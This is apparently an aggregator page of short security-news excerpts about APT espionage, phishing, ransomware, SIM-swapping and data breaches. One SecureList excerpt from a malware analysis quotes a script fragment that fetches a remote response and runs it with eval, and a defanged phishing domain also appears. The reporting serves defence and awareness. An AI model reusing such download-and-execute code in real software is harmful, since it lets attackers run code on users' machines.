SecureList

NOVEMBER 29, 2024

Mobile statistics Targeted attacks New APT threat actor targets Russian government entities In May 2024, we discovered a new APT targeting Russian government organizations. Two months later, in July 2024, CloudSorcerer launched further attacks against Russian government organizations and IT companies.

Energy and Utilities 98

Energy and Utilities Ransomware Malware Government 98

Security Affairs

FEBRUARY 27, 2025

. “The timing of the attack was especially unfortunate, as we were in the midst of a major recruitment drive following the previous government’s decision to almost double our workforce,” an anonymous intelligence source told Le Soir. Earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.

Malware 77

Malware Hacking Government Phishing 77

Security Affairs

APRIL 30, 2025

PRODAFT researchers warn of Russia-linked APT group Nebulous Mantis targeting NATO-related defense organizations Nebulous Mantis, a Russian-speaking cyber espionage group (aka Cuba, STORM-0978 , Tropical Scorpius , UNC2596 ), used RomCom RAT and Hancitor since 2019 to target critical infrastructure, governments, and NATO-linked entities.

Encryption 107

Encryption Ransomware Malware Phishing 107

SecureList

FEBRUARY 20, 2025

Kaspersky MDR customers by region Distribution of incidents by industry In 2024, the MDR team observed the highest number of incidents in the industrial (25.7%), financial (14.1%), and government (11.7%) sectors. in government, 17.8% User Execution and Phishing remain top threats. in IT, 18.3% in industrial, and 11.9%

Phishing 100

Phishing Social Engineering Government Threat Detection 100

Malwarebytes

MAY 1, 2025

Phishing In phishing scams, cybercriminals trick people and businesses into handing over sensitive information like credit card numbers or login details for vital online accounts. In phishing attacks, there never is a genuine problem with a users account, and there never is a real request for information from the company.

Small Business 91

Small Business Cybersecurity Scams Passwords 91

SecureList

NOVEMBER 28, 2024

The most remarkable findings In the second half of 2022, a wave of attacks from an unknown threat actor targeted victims with a new type of attack framework that we dubbed P8. Based on limited telemetry, we believe with medium to low confidence that some of the initial infections were spear-phishing emails.

Malware 113

Malware Government Software Spyware 113

Security Affairs

MAY 21, 2025

The APT28 group (aka Fancy Bear , Pawn Storm , Sofacy Group , Sednit , BlueDelta, and STRONTIUM ) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. Attackers sent emails mimicking government/cloud providers, often in the target language, and used lures like legit documents.

Technology 82

Technology Malware Phishing Government 82

Security Affairs

JULY 18, 2025

Based on information from open sources, government experts linked multiple Phobos ransomware variants to Phobos intrusions due to observed similarities in Tactics, Techniques, and Procedures (TTPs). Threat actors behind Phobos attacks were observed gaining initial access to vulnerable networks by leveraging phishing campaigns.

Ransomware 133

Ransomware Encryption Malware Cybercrime 133

Centraleyes

DECEMBER 16, 2024

By 2027, 75% of employees are expected to acquire or modify technology outside of ITs control, up from 41% in 2022. We are seeing increased use of AI to automate attacks, including malware generation and phishing campaigns. We are seeing increased use of AI to automate attacks, including malware generation and phishing campaigns.

Cybersecurity 98

Cybersecurity Insurance Cyber Insurance Technology 98

SecureWorld News

MAY 14, 2025

Top cybercrime categories: Phishing/spoofing: 193,407 complaints Extortion: 86,415 complaints Personal data breaches: 64,882 complaints Cryptocurrency-related scams: Nearly 150,000 complaints involved cryptocurrency, accounting for $9.3 Other critical sectors, including manufacturing and government facilities, also faced significant threats.

Cybercrime 83

Cybercrime Scams Cryptocurrency Internet 83

Security Affairs

JANUARY 10, 2025

MirrorFacewas first spotted by ESET in 2022, targeting Japanese political entities ahead of elections. Between 2019 and 2024, the MirrorFace group launched three cyber campaigns targeting Japanese think tanks, government, academia, and key industries. ” reads the report published by NPA.“This

Antivirus 82

Antivirus Malware System Administration Technology 82

BH Consulting

OCTOBER 24, 2024

Cyber Ireland, the national cybersecurity cluster supported by the Irish Government, worked in partnership with EI and NCSC, giving input into the initiative’s development before its launch. billion to the Irish economy over the last year, as the number of active companies increased by 9 per cent since 2022.

Social Engineering 69

Social Engineering Passwords Cybersecurity Ransomware 69

Centraleyes

JULY 10, 2025

No passwords, credit card numbers, passport data, or government ID details were involved in the breach, and Qantas has stated there is currently no evidence that the data has been leaked publicly. “We These attacks are often executed by sophisticated criminal groups employing social engineering, phishing, or insider access.

Data breaches 52

Data breaches Social Engineering Government Phishing 52

Security Boulevard

JUNE 27, 2025

government agencies, including the Department of Homeland Security (DHS) , about potential retaliatory attacks from cyber actors affiliated with the Iranian government as well as hacktivists. government agencies about retaliatory attacks, we’re also seeing a slight increase in reported activity by threat actors.

Accountability 58

Accountability Passwords Authentication Energy and Utilities 58

SecureWorld News

JULY 22, 2025

The wake of incidents like the Nord Stream pipeline sabotage in September 2022 served as a stark wake-up call, exposing the immense vulnerability of these essential arteries. The problem is not solely up to militaries or governments to solve. Countries from Europe and the U.S.,

Surveillance 74

Surveillance Artificial Intelligence Technology Digital transformation 74

Security Affairs

MARCH 11, 2025

In the 2022 attacks, the threat actors also targeted departments of Foreign Affairs, Scientific and Defence organisations, Aviation, IT industry, and Legal firms. The infection flow is the same as past attacks, threat actors send spear-phishing emails with a DOCX file attached.

Malware 74

Malware Government Phishing Hacking 74

Centraleyes

MARCH 13, 2025

NYDFS proposed amendments to the cybersecurity regulation in late 2022 to address the evolving threat landscape. Enhanced Governance Requirements Entities must appoint a qualified Chief Information Security Officer (CISO) with a direct reporting line to the board of directors. Whats New in the NYDFS Cybersecurity Regulation Amendment?

Cybersecurity 52

Cybersecurity Financial Services Risk Encryption 52

SecureList

DECEMBER 18, 2024

Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022. Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. Besides data theft, its goal is to inflict maximum damage, including reputational. Messages from the C.A.S Victims C.A.S

Encryption 83

Encryption Passwords Accountability Ransomware 83

SecureWorld News

DECEMBER 27, 2024

Greater Collaboration Between Governments and the Private Sector: Initiatives to share threat intelligence will strengthen, fostering a collective defense strategy against increasingly sophisticated cyber adversaries. Expect to see AI-enabled phishing campaigns, deepfake scams, and automated attacks grow in complexity.

Cybersecurity 123

Cybersecurity CISO Risk Government 123

Webroot

OCTOBER 31, 2024

The rise of AI-driven phishing and social engineering, increased targeting of critical infrastructure, and the emergence of more sophisticated fileless malware are all trends that have shaped the cybersecurity battlefield this year. By August 2024, RansomHub had breached at least 210 victims across various critical U.S.

Malware 117

Malware Ransomware Healthcare Passwords 117

SecureList

OCTOBER 15, 2024

Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal. net/015094_consulategz",false);x.Send();eval(x.ResponseText);window.close()") Initial infection LNK During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached.

Malware 140

Malware Encryption Architecture Phishing 140

Krebs on Security

JULY 10, 2025

.” In 2023, KrebsOnSecurity published an investigation into the work of three different SIM-swapping groups that phished credentials from T-Mobile employees and used that access to offer a service whereby any T-Mobile phone number could be swapped to a new device.

Cybercrime 242

Cybercrime Social Engineering Retail Mobile 242

Krebs on Security

NOVEMBER 26, 2024

“In the event you do not reach out to us @ATNT all presidential government call logs will be leaked,” Kiberphant0m threatened, signing his post with multiple “#FREEWAIFU” tags. government agencies and emergency first responders. Trump and for Vice President Kamala Harris. Also on Nov. Way back on Nov.

DDOS 339

DDOS Cybercrime Accountability Government 339

Krebs on Security

JUNE 30, 2025

The execution of this phishing and impersonation campaign — whatever its goals may have been — suggested the attackers were financially motivated, and not particularly sophisticated. But I have had Apple’s Lockdown Mode enabled on all of my Apple devices since it was first made available in September 2022.

Mobile 258

Mobile Spyware InfoSec Phishing 258

Krebs on Security

SEPTEMBER 1, 2023

Domain names ending in “ US ” — the top-level domain for the United States — are among the most prevalent in phishing scams, new research shows. government, which is frequently the target of phishing domains ending in.US. US phishing domains.US government overall, nor to the US public.”

Phishing 333

Phishing Telecommunications Government DNS 333

Security Affairs

APRIL 21, 2022

Threat intelligence firm Resecurity details how crooks are delivering IRS tax scams and phishing attacks posing as government vendors. The identified phishing e-mail warned the victims about overdue payments to the IRS, which should then be paid via PayPal, the e-mail contained an HTML attachment imitating an electronic invoice.

Scams 136

Scams Phishing Government Hacking 136

Krebs on Security

JANUARY 30, 2024

technology companies during the summer of 2022. stole at least $800,000 from at least five victims between August 2022 and March 2023. The government says Urban went by the aliases “ Sosa ” and “ King Bob ,” among others. A graphic depicting how 0ktapus leveraged one victim to attack another.

Social Engineering 363

Social Engineering Cybercrime Mobile Identity Theft 363

Security Boulevard

JANUARY 28, 2025

This report highlights observed phishing threat actor abuse of.gov top-level domains (TLDs) for different countries over two years from November 2022 to November 2024. The post Threat Actors Exploit Government Website Vulnerabilities for Phishing Campaigns appeared first on Security Boulevard.

Phishing 99

Phishing Government 99

Krebs on Security

OCTOBER 9, 2023

The fake USPS phishing page. Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Here’s a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries. com usps.trckspost[.]com

Phishing 345

Phishing Scams Passwords Government 345

Security Affairs

JUNE 21, 2022

Experts identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. USA) has identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. 1 – Example of Phishing Page Delivered by Azure Front Door (AFD).

Phishing 145

Phishing Accountability Hacking Scams 145

Krebs on Security

AUGUST 29, 2023

government today announced a coordinated crackdown against QakBot , a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. QakBot is most commonly delivered via email phishing lures disguised as something legitimate and time-sensitive, such as invoices or work orders.

Hacking 333

Hacking Malware Ransomware Government 333

Security Affairs

MAY 25, 2022

An unknown APT group is targeting Russian government entities since the beginning of the Russian invasion of Ukraine. In the third campaign, threat actors targeted the Rostec defense conglomerate, the phishing messages used build_rosteh4.exe This campaign primarily targeted RT TV employees. exe for its malware. Pierluigi Paganini.

Government 136

Government Malware Phishing Hacking 136

Krebs on Security

OCTOBER 31, 2023

The top-level domain for the United States — US — is home to thousands of newly-registered domains tied to a malicious link shortening service that facilitates malware and phishing scams, new research suggests. domains as among the most prevalent in phishing attacks over the past year. US phishing domains.

Phishing 352

Phishing Telecommunications Malware Scams 352

CyberSecurity Insiders

JANUARY 25, 2023

United States Cybersecurity and Infrastructure Security Agency (CISA) along with two other agencies; National Security Agency (NSA) and Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a warning to federal agencies against a phishing scam taking place through Remote Monitoring and Management (RMM) Software.

Scams 134

Scams Phishing Software Social Engineering 134

Security Affairs

FEBRUARY 25, 2022

The CERT of Ukraine (CERT-UA) warned of a spear-phishing campaign targeting Ukrainian armed forces personnel. The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of an ongoing spear-phishing campaign targeting private email accounts belonging to Ukrainian armed forces personnel. reads a translation of the message.

Phishing 127

Phishing Social Engineering Government Accountability 127

SecureList

MAY 27, 2022

IT threat evolution in Q1 2022. IT threat evolution in Q1 2022. IT threat evolution in Q1 2022. The group uses various malware families, including Wroba, and attack methods that include phishing, mining, smishing and DNS poisoning. Subsequently, DDoS attacks hit some government websites. The phishing kit market.

Phishing 128

Phishing Spyware Firmware Malware 128

The Hacker News

NOVEMBER 18, 2022

A notorious advanced persistent threat actor known as Mustang Panda has been linked to a spate of spear-phishing attacks targeting government, education, and research sectors across the world.

Government 111

Government Education Phishing Cybersecurity 111